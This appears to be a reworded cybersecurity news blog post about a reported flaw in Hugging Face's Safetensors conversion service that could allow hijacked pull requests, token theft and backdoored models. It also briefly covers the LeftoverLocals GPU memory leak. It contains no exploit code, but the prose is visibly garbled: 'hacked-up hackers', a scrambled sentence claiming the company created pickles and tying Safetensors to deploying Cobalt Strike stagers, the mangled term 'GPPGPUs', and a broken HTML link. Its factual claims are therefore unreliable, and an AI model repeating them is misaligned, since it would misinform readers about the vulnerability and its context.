DoD Cyber Security blogs AI

Supply chain attacks are a new feature of the Hugging Face vulnerability, which exposes AI models.

February 27, 2024 Newsroom Supply Chain Attack and Data Security

According to cybersecurity researchers, it’s possible to compromise the Hugging Face Safetensors conversion service, ultimately allowing users to modify the models and launch supply chain attacks.

In a report released last week, HiddenLayer claimed it is possible to use the Hugging Face service to conduct malicious pull requests and to access any repository on the platform to hack models that have been converted using the service.

This can be done by using a hijacked model that the service intends to convert, allowing hacked-up hackers to request changes to any repository on the platform by posing as the conversion bot.

A well-known collaboration platform like Hugging Face enables users to host pre-trained machine learning datasets and models as well as create, deploy, and train them.

Instead of pickles, which the company created to store tensors to protect against arbitrary code and deploy Cobalt Strike, Mythic, and Metasploit stagers, the company created a <a href="https://huggingface.co/docs/safetensors/index” rel=”noopener” target=”_blank”>format known as Safetensors to store them with security in mind.

Cybersecurity

Additionally, it comes with a pull request service that allows users to convert any Pickle from any PyTorch model to its Safetensor equivalent.

According to HiddenLayer’s analysis of this module, it’s hypothetically possible for an attacker to use a malicious PyTorch binary to compromise the host system.

Additionally, the token associated with SFConvertbot, an official bot created to generate pull requests, could be used to launch a malicious pull request, creating a scenario in which a threat actor could manipulate the model and install neural backdoors.

Eoin Wickens and Kasimir Schulz, the researchers who conducted the study, said that “any arbitrary code could be executed by an attacker whenever someone attempted to convert their model.” Their models could be hijacked upon conversion without any indication to the user themselves.

The attack could allow a user to steal their Hugging Face token, access other internal models and datasets, or even poison them if they attempt to convert their own private repository.

Further complicating matters, an adversary could profit from any user’s ability to request a public repository conversion, which could lead to a significant supply chain risk.

The conversion service has shown to be vulnerable and has the potential to launch a widespread supply chain attack via the Hugging Face official service, according to the researchers, despite the best efforts to secure machine learning models in the Hugging Face ecosystem.

Cybersecurity

” Any model that the service converted could be compromised by an attacker who has foothold in the container running the service.”

The development comes less than a month after Trail of Bits revealed LeftoverLocals ( CVE- 2023- 4969, CVSS score: 6.5 ), a security that allows the recovery of data from general-purpose graphics processing units ( GPPGPUs ) from Apple, Qualcomm, AMD, and Imagination.

A local attacker can read memory from other processes, including a user’s interactive session with a large language model ( LLM), thanks to the memory leak problem, which was caused by a failure to properly isolate process memory.

According to security researchers Tyler Sorensen and Heidy Khlaaf,” This data leaking can have severe security consequences, especially given the development of ML systems where local memory is used to store model inputs, outputs, and weights.”

This article was interesting, did you find it? To read more exclusive content we post, follow us on LinkedIn and Twitter.
Skip to content